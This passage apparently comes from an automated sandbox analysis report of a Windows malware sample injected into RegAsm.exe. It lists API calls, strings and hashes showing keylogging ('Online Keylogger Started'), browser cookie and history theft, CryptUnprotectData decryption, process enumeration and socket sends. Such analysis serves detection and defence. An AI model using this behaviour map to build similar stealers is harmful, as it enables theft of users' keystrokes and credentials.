                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                                                                        • _free.LIBCMT ref: 0044943D
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 00449609
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                        • String ID:
                                                                                                        • API String ID: 1286116820-0
                                                                                                        • Opcode ID: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                        • Instruction ID: 45cf5ea20785abb2a7eec221213eb08c1b8584214e6df16efc40294c4842d026
                                                                                                        • Opcode Fuzzy Hash: 5cd2e88b37ead4a53a3ad7e2b8222e2e62bf3e8d34a7aba608fbabac987024fa
                                                                                                        • Instruction Fuzzy Hash: 1B51EC71900205ABEB14EF69DD819AFB7B8EF44724F20066FE418D3291EB789D41DB58
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 0040F97A
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F989
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040FB40
                                                                                                          • Part of subcall function 0041C076: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F634,00000000,?,?,00475338), ref: 0041C08B
                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                          • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                        • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FB31
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$OpenProcess32$Next$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                                                                                        • String ID:
                                                                                                        • API String ID: 4269425633-0
                                                                                                        • Opcode ID: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                                                        • Instruction ID: d02cab962e177bd28921c4f9a71df23b762ba7d31cecf8da060328e0f3db66c6
                                                                                                        • Opcode Fuzzy Hash: 5013d04b6558d5b24e4612dd319dda4bb727b03e7287b844ebb1e8f149362748
                                                                                                        • Instruction Fuzzy Hash: 5F4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                        • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                        • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                        • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,?,00000000,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92), ref: 004511F9
                                                                                                        • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,00000000,00000000,0042DD92,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?), ref: 00451282
                                                                                                        • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,?,00000001,0042DD92,0042DD92,?,00000002,00000000), ref: 00451294
                                                                                                        • __freea.LIBCMT ref: 0045129D
                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                        • String ID:
                                                                                                        • API String ID: 313313983-0
                                                                                                        • Opcode ID: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                        • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                        • Opcode Fuzzy Hash: 505ad9812f568066b07f0fb8a09e4f725dd1d0495a5b090eb77152ea1c2fabb2
                                                                                                        • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                        • _free.LIBCMT ref: 0044F43F
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 336800556-0
                                                                                                        • Opcode ID: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                        • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                        • Opcode Fuzzy Hash: bd5b513fc8b609e28947bb0fbcaa4a85653cdf481583ed06f966610d709b3706
                                                                                                        • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                        APIs
                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,0043BCD6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044831E
                                                                                                        • _free.LIBCMT ref: 00448353
                                                                                                        • _free.LIBCMT ref: 0044837A
                                                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448387
                                                                                                        • SetLastError.KERNEL32(00000000,?,00405103), ref: 00448390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLast$_free
                                                                                                        • String ID:
                                                                                                        • API String ID: 3170660625-0
                                                                                                        • Opcode ID: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                        • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                        • Opcode Fuzzy Hash: 9e58827e066efea2178fd81b79d5a13276d1a5d22b614d366fbfb6265f5784d7
                                                                                                        • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00450A54
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 00450A66
                                                                                                        • _free.LIBCMT ref: 00450A78
                                                                                                        • _free.LIBCMT ref: 00450A8A
                                                                                                        • _free.LIBCMT ref: 00450A9C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                        • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                        • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                        • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                        APIs
                                                                                                        • _free.LIBCMT ref: 00444106
                                                                                                          • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000), ref: 00446818
                                                                                                          • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                        • _free.LIBCMT ref: 00444118
                                                                                                        • _free.LIBCMT ref: 0044412B
                                                                                                        • _free.LIBCMT ref: 0044413C
                                                                                                        • _free.LIBCMT ref: 0044414D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 776569668-0
                                                                                                        • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                        • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                        • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                        • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                        APIs
                                                                                                        • _strpbrk.LIBCMT ref: 0044E7B8
                                                                                                        • _free.LIBCMT ref: 0044E8D5
                                                                                                          • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0043BD6A
                                                                                                          • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                                                                          • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                                                                                        • String ID: *?$.
                                                                                                        • API String ID: 2812119850-3972193922
                                                                                                        • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                        • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                                                                                        • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                                                                        • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountEventTick
                                                                                                        • String ID: !D@$NG
                                                                                                        • API String ID: 180926312-2721294649
                                                                                                        • Opcode ID: 5b4807bddc6210b94037523f865424e3dee7acccfcb5b024bb26cbe5c68b9620
                                                                                                        • Instruction ID: 3ac9408315e1e6036cedb879f74fb80cbd33a95067926c5a5f9e9f7d680cff10
                                                                                                        • Opcode Fuzzy Hash: 5b4807bddc6210b94037523f865424e3dee7acccfcb5b024bb26cbe5c68b9620
                                                                                                        • Instruction Fuzzy Hash: 3E51A5315082019AC724FB32D852AFF73A5AF94304F50483FF54A671E2EF3C5945C68A
                                                                                                        APIs
                                                                                                        • GetKeyboardLayoutNameA.USER32(?), ref: 00409F0E
                                                                                                          • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                                                                                          • Part of subcall function 0041C5A6: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0041C5BB
                                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateFileKeyboardLayoutNameconnectsend
                                                                                                        • String ID: XQG$NG$PG
                                                                                                        • API String ID: 1634807452-3565412412
                                                                                                        • Opcode ID: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                                                        • Instruction ID: 86122f73fea86c9dce3a8c8dcd7d10d1556e7c038dfd98f63e082762e027ad1b
                                                                                                        • Opcode Fuzzy Hash: e3cbe9e01f77a77e9f2618075dd2463eb662c8aee28ccbe5d1f3042206ea7278
                                                                                                        • Instruction Fuzzy Hash: 955120315082419BC328FB32D851AEFB3E5AFD4348F50493FF54AA71E2EF78594A8649
                                                                                                        APIs
                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 00443515
                                                                                                        • _free.LIBCMT ref: 004435E0
                                                                                                        • _free.LIBCMT ref: 004435EA
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$FileModuleName
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        • API String ID: 2506810119-1068371695
                                                                                                        • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                        • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                                                                                        • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                                                                                        • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                          • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,63A01986,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                          • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                          • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                        • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                        • String ID: /sort "Visit Time" /stext "$0NG
                                                                                                        • API String ID: 368326130-3219657780
                                                                                                        • Opcode ID: dbfc991e12a440ef4067fcebd0cc856a0ede93a62912bc3cad98de8923435619
                                                                                                        • Instruction ID: 7a7c83aa22bf4ff3424ba87d95d637a61540eed1193ecfb54830ab602693969f
                                                                                                        • Opcode Fuzzy Hash: dbfc991e12a440ef4067fcebd0cc856a0ede93a62912bc3cad98de8923435619
                                                                                                        • Instruction Fuzzy Hash: 2C316371A0011956CB15FBA6DC569ED7375AF90308F00007FF60AB71E2EF785D49CA99
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 00416330
                                                                                                          • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                          • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                          • Part of subcall function 004138B2: RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                          • Part of subcall function 00409E1F: _wcslen.LIBCMT ref: 00409E38
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$CloseCreateValue
                                                                                                        • String ID: !D@$okmode$PG
                                                                                                        • API String ID: 3411444782-3370592832
                                                                                                        • Opcode ID: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                                        • Instruction ID: 097cdf197a66b89fefcd85ce8a19d7acc75244c7017ebd4eb32b8c3ef24b572d
                                                                                                        • Opcode Fuzzy Hash: bbd17316e02ab87431fe8abe2f6f4f57bb2f26a84c7141214b75d0818d7c1fed
                                                                                                        • Instruction Fuzzy Hash: 1E11A571B442011BDA187B32D862BBD22969F84348F80843FF546AF2E2DFBD4C51975D
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000), ref: 0040C531
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C6C3
                                                                                                        Strings
                                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                        • API String ID: 1174141254-1980882731
                                                                                                        • Opcode ID: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                        • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                        • Opcode Fuzzy Hash: d340a52fd8d1078a812560c7ffc03c5fafbdbc6e30ffa616e893859f76221ba6
                                                                                                        • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000), ref: 0040C594
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0040C792
                                                                                                        Strings
                                                                                                        • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                        • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExistsFilePath
                                                                                                        • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                        • API String ID: 1174141254-1980882731
                                                                                                        • Opcode ID: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                        • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                        • Opcode Fuzzy Hash: a04e00169c7cbbbccb250a5240b13a8e35c904a89c0728d580383dd97c6ecba8
                                                                                                        • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                        • wsprintfW.USER32 ref: 0040B22E
                                                                                                          • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: EventLocalTimewsprintf
                                                                                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                                                                                        • API String ID: 1497725170-1359877963
                                                                                                        • Opcode ID: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                                                        • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                                                                                        • Opcode Fuzzy Hash: 835af189ca981617db22efa5ec6b45afe77894dc59cba662e28b480f06d20bf8
                                                                                                        • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                                                                                        APIs
                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                          • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTime$wsprintf
                                                                                                        • String ID: Online Keylogger Started
                                                                                                        • API String ID: 112202259-1258561607
                                                                                                        • Opcode ID: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                        • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                        • Opcode Fuzzy Hash: 3c1e5f1726eb6ad3dfbc213d1afd6b44996bcee0f74f9eb9af7ab1802c39fff0
                                                                                                        • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(crypt32), ref: 00406ABD
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: CryptUnprotectData$crypt32
                                                                                                        • API String ID: 2574300362-2380590389
                                                                                                        • Opcode ID: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                        • Instruction ID: 59ed3cbb63f31e38ea488d6bd85f24bb9ff1ce5495ed4d1509158228521d53cd
                                                                                                        • Opcode Fuzzy Hash: 905686a6130e311fdcec2a0cd22c75bab7e39712089f0cc697143e337071fc99
                                                                                                        • Instruction Fuzzy Hash: 2C01B975604216BBCB18CFAD9D449AF7BB4AB45300B00417EE956E3381DA74E9008B95
                                                                                                        APIs
                                                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                        • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEventHandleObjectSingleWait
                                                                                                        • String ID: Connection Timeout
                                                                                                        • API String ID: 2055531096-499159329
                                                                                                        • Opcode ID: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                        • Instruction ID: b176daa04f7f78a72cd0d213bf0bcd41e0e3849ccec9e2477ca34bbc74fb9340
                                                                                                        • Opcode Fuzzy Hash: 9f6ecd509c0a7bd309a8898773f2a48374a0d847cbc707063012ebd492618a2f
                                                                                                        • Instruction Fuzzy Hash: C901F530940F00AFD7216B368D8642BBFE0EF00306704093EE68356AE2D6789800CF89
                                                                                                        APIs
                                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                                                                                        Strings
                                                                                                        Memory Dump Source
